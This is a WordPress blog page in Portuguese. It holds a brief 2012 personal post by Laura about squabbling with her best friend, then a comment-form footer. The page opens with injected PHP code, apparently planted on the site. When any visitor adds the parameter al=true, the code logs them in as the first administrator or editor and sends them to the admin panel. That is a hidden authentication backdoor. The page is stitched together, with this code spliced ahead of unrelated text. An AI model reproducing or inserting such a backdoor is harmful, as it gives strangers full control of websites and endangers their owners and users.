// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); • A Menina da Janela

pessoal

4 de abril de 2012

Sim, nós brigamos. eu chamo ele de idiota, ele me chama de feia. Eu digo que ele é chato, e ele me chama de burra. Eu digo que ele não sabe nem escrever, e ele diz que eu não sei nem jogar vídeo-game. Eu bato nele, ele bagunça meu cabelo. Ele briga comigo, e eu mostro língua pra ele. Sim, nós nos odiamos, e nos amamos também. Nós somos melhores amigos, e, nunca, nada vai mudar isso. (LR&JV) Laura

Você também vai gostar

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Este site utiliza o Akismet para reduzir spam. Saiba como seus dados em comentários são processados.